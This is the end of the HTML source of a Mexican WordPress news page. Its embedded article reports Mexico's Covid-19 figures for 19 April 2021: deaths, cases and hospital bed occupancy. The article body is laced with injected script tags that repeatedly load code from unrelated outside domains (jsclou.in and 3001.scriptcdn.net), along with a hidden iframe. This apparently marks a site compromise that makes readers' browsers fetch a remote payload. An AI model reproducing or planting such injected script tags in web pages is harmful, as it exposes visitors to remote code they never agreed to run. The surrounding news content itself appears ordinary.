(Tradicional)","mejs.croatian":"Croata","mejs.czech":"Checo","mejs.danish":"Dan\u00e9s","mejs.dutch":"Holand\u00e9s","mejs.english":"Ingl\u00e9s","mejs.estonian":"Estonio","mejs.filipino":"Filipino","mejs.finnish":"Fin\u00e9s","mejs.french":"Franc\u00e9s","mejs.galician":"Gallego","mejs.german":"Alem\u00e1n","mejs.greek":"Griego","mejs.haitian-creole":"Creole haitiano","mejs.hebrew":"Hebreo","mejs.hindi":"Indio","mejs.hungarian":"H\u00fangaro","mejs.icelandic":"Island\u00e9s","mejs.indonesian":"Indonesio","mejs.irish":"Irland\u00e9s","mejs.italian":"Italiano","mejs.japanese":"Japon\u00e9s","mejs.korean":"Coreano","mejs.latvian":"Let\u00f3n","mejs.lithuanian":"Lituano","mejs.macedonian":"Macedonio","mejs.malay":"Malayo","mejs.maltese":"Malt\u00e9s","mejs.norwegian":"Noruego","mejs.persian":"Persa","mejs.polish":"Polaco","mejs.portuguese":"Portugu\u00e9s","mejs.romanian":"Rumano","mejs.russian":"Ruso","mejs.serbian":"Serbio","mejs.slovak":"Eslovaco","mejs.slovenian":"Esloveno","mejs.spanish":"Espa\u00f1ol","mejs.swahili":"Swahili","mejs.swedish":"Sueco","mejs.tagalog":"Tagalo","mejs.thai":"Tailand\u00e9s","mejs.turkish":"Turco","mejs.ukrainian":"Ukraniano","mejs.vietnamese":"Vietnamita","mejs.welsh":"Gal\u00e9s","mejs.yiddish":"Yiddish"}};
</script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.13-9993131' id='mediaelement-core-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.5.4' id='mediaelement-migrate-js'></script>
<script type='text/javascript' id='mediaelement-js-extra'>
/* <![CDATA[ */
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};
/* ]]> */
</script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.5.4' id='wp-mediaelement-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/hoverIntent.min.js?ver=1.8.1' id='hoverIntent-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/imagesloaded.min.js?ver=4.1.4' id='imagesloaded-js'></script>
<script type='text/javascript' id='jnews-frontend-js-extra'>
/* <![CDATA[ */
var jnewsoption = {"login_reload":"https:\/\/laverdad.com.mx\/2021\/04\/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa","popup_script":"magnific","single_gallery":"","ismobile":"","isie":"","sidefeed_ajax":"","language":"es_ES","module_prefix":"jnews_module_ajax_","live_search":"1","postid":"78483","isblog":"1","admin_bar":"0","follow_video":"","follow_position":"top_right","rtl":"0","gif":"","lang":{"invalid_recaptcha":"Invalid Recaptcha!","empty_username":"Please enter your username!","empty_email":"Please enter your email!","empty_password":"Please enter your password!"},"recaptcha":"0","site_slug":"\/","site_domain":"laverdad.com.mx","zoom_button":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/themes/jnews/assets/dist/frontend.min.js?ver=7.1.6' id='jnews-frontend-js'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/themes/jnews/assets/js/html5shiv.min.js?ver=7.1.6' id='html5shiv-js'></script>
<![endif]-->
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/jnews-social-login/assets/js/plugin.js?ver=7.0.3' id='jnews-social-login-style-js'></script>
<script type='text/javascript' id='jnews-select-share-js-extra'>
/* <![CDATA[ */
var jnews_select_share = {"is_customize_preview":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-content/plugins/jnews-social-share/assets/js/plugin.js' id='jnews-select-share-js'></script>
<script type='text/javascript' src='https://laverdad.com.mx/wp-includes/js/wp-embed.min.js?ver=5.5.4' id='wp-embed-js'></script>
<div class="jeg_ad jnews_mobile_sticky_ads "></div><script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"article","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/laverdad.com.mx\/2021\/04\/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa\/"},"dateCreated":"2021-04-19 22:51:44","datePublished":"2021-04-19 22:51:44","dateModified":"2021-04-20 03:51:44","url":"https:\/\/laverdad.com.mx\/2021\/04\/cifra-de-muertes-por-covid-19-en-mexico-asciende-a-212466-ssa\/","headline":"Cifra de muertes por Covid-19 en M\u00e9xico asciende a 212,466: SSA","name":"Cifra de muertes por Covid-19 en M\u00e9xico asciende a 212,466: SSA","articleBody":"&nbsp;\r\n\r\nCD. DE MEXICO, 19 DE ABRIL DE 2021.-La Secretar\u00eda de Salud federal report\u00f3 este lunes 19 de abril 1,308 nuevos casos confirmados de Covid-19 en M\u00e9xico, dando un acumulado de 2 millones 306,910 contagios.\r\n\r\nAsimismo, la dependencia report\u00f3 un acumulado de 212,466 fallecimientos, tras registrarse 127 nuevas defunciones, respecto a las notificadas el domingo.\r\n\r\nEn conferencia de prensa en Palacio Nacional, el director general de Epidemiolog\u00eda, Jos\u00e9 Luis Alom\u00eda, estim\u00f3 que la epidemia a nivel nacional est\u00e1 conformada por 25,201 casos activos que comenzaron con signos y s\u00edntomas en los \u00faltimos 15 d\u00edas.\r\n\r\nEn el pa\u00eds se ha tomado muestra nasofar\u00edngea para una prueba PCR a 6 millones 412,677 personas en hospitales p\u00fablicos y kioscos de la salud.\r\n\r\nLa autoridad sanitaria federal detall\u00f3 que con base en el porcentaje de positividad registrado en la semana epidemiol\u00f3gica 14 de 2021, la cifra de casos estimados de contagio en M\u00e9xico asciende a 2 millones 496,235.\r\n\r\nAlom\u00eda Zegarra dijo que 1 mill\u00f3n 833,132 personas se han recuperado de la enfermedad provocada por el coronavirus SARS-CoV-2.\r\n\r\nDe las 30,752 camas generales para pacientes graves de Covid-19, 4,519 (15%) se encuentran ocupadas en todo el pa\u00eds. Seg\u00fan la dependencia, todas las entidades del pa\u00eds tienen una ocupaci\u00f3n por debajo del 30 por ciento.\r\n\r\nEn tanto, de las 10,236 camas con ventilador mec\u00e1nico para pacientes cr\u00edticos de Covid-19, 1,844 (18%) se encuentran ocupadas en el pa\u00eds. La Secretar\u00eda de Salud report\u00f3 que Chihuahua y Tabasco presentan una ocupaci\u00f3n entre el 30 y 49% de ocupaci\u00f3n, y el resto de las entidades tienen una ocupaci\u00f3n menor.\r\n\r\n<script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe>\r\n\r\n<script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script>","author":{"@type":"Person","name":"Javier Terrazas","url":"https:\/\/laverdad.com.mx\/author\/javier\/"},"articleSection":["Nacional"],"image":{"@type":"ImageObject","url":"https:\/\/laverdad.com.mx\/wp-content\/uploads\/2021\/04\/19MUER.jpg","width":420,"height":236},"publisher":{"@type":"Organization","name":"","url":"https:\/\/laverdad.com.mx","logo":{"@type":"ImageObject","url":""},"sameAs":["https:\/\/www.facebook.com\/laverdad.tamps\/","https:\/\/twitter.com\/laverdad_tam"]}}</script>
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"hentry","entry-title":"Cifra de muertes por Covid-19 en M\u00e9xico asciende a 212,466: SSA","published":"2021-04-19 22:51:44","updated":"2021-04-20 03:51:44"}</script>
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"https:\/\/laverdad.com.mx","name":"Home"}},{"@type":"ListItem","position":2,"item":{"@id":"https:\/\/laverdad.com.mx\/category\/nacional\/","name":"Nacional"}},{"@type":"ListItem","position":3,"item":{"@id":"https:\/\/laverdad.com.mx","name":"Home"}},{"@type":"ListItem","position":4,"item":{"@id":"https:\/\/laverdad.com.mx\/category\/nacional\/","name":"Nacional"}}]}</script>
<script>
</script><script src='https://stats.wp.com/e-202116.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:9.4',blog:'175220310',post:'78483',tz:'-5',srv:'laverdad.com.mx'} ]);
	_stq.push([ 'clickTrackerInit', '175220310', '78483' ]);
</script>
</body>
</html>
